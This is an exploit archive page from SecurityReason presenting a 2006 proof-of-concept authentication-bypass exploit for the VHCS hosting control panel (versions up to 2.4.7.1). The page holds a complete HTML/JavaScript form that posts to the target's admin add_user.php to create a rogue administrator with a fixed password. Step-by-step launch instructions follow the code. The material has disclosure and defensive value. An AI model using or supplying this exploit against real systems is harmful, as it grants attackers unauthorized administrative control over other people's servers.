SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

VHCS <= 2.4.7.1 (Add User) Authentication Bypass Exploit


Arrow  ExploitAlert : 335
Arrow  Credit : RoMaNSoFt
Arrow  Date : 24.02.2006

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

<html>

<head>
<title>VHCS (version <= 2.4.7.1) PoC.  By RoMaNSoFt</title>
<script language="JavaScript">
function submitform()
{
if (document.admin_add_user.username.value=='admin')
{
alert('Learn to read before launching an exploit, script-kiddie!');
exit();
}

document.admin_add_user.action=document.admin_add_user.target.value;
document.admin_add_user.submit();
}
</script>
</head>

<body>
<hr>
<center>
<b>VHCS (version <= 2.4.7.1) PoC.  By RoMaNSoFt
<roman@rs-labs.com>  [08.Feb.2006]</b>

</center>
<hr>

<form name="admin_add_user" method="post" action="">
<table width="100%" cellpadding="5" cellspacing="5">
<tr>
<td width="20"> </td>
<td colspan="2">
 
</td>

</tr>
<tr>
<td width="20"> </td> <td width="200">Target URL</td>
<td>
<input type="text" name="target"
value="http://<target>/vhcs2/admin/add_user.php" style="width:400px">
</td>
</tr>

<tr>

<td width="20"> </td> <td width="200">Username</td>
<td>
<input type="text" name="username" value="admin"
style="width:200px"> (should NOT exist)
</td>
</tr>
<tr>
<td> </td>
<td colspan="2"><a href="javascript: submitform()">Exploit
it!</a></td>
</tr>

<tr>
<td colspan="3"> 
</td>
</tr>
</table>
<input type="hidden" name="pass" value="dsrrocks">
<input type="hidden" name="pass_rep" value="dsrrocks">
<input type="hidden" name="email"
value="vhcs-exploit@rs-labs.com">
<input type="hidden" name="uaction" value="add_user">
</form>


<hr>
<br>
<u>Quick instructions</u>.-<br>
<br>
1.- Enable JavaScript. Fill in the form with appropiate target URL
(usually you will only need to replace <target> string) and
username.<br>
2.- Remember not to use a probably existing username (such as
"admin").<br>

3.- Launch the exploit. <i>If target system is vulnerable, a new
VHCS admin user will be created</i> ;-)<br>
4.- You will be redirected to VHCS login page. Try to login with
your brand new username.<br>
5.- Ummm, I forgot it... The password is: <b>dsrrocks</b>.<br>

<br>

<u>More info (analysis, fix, etc)</u>.-<br>
<br>
See <a
href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt><i>RS-2006-1</i
></a>.<br>
<br>
<hr>
</body>

</html>





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.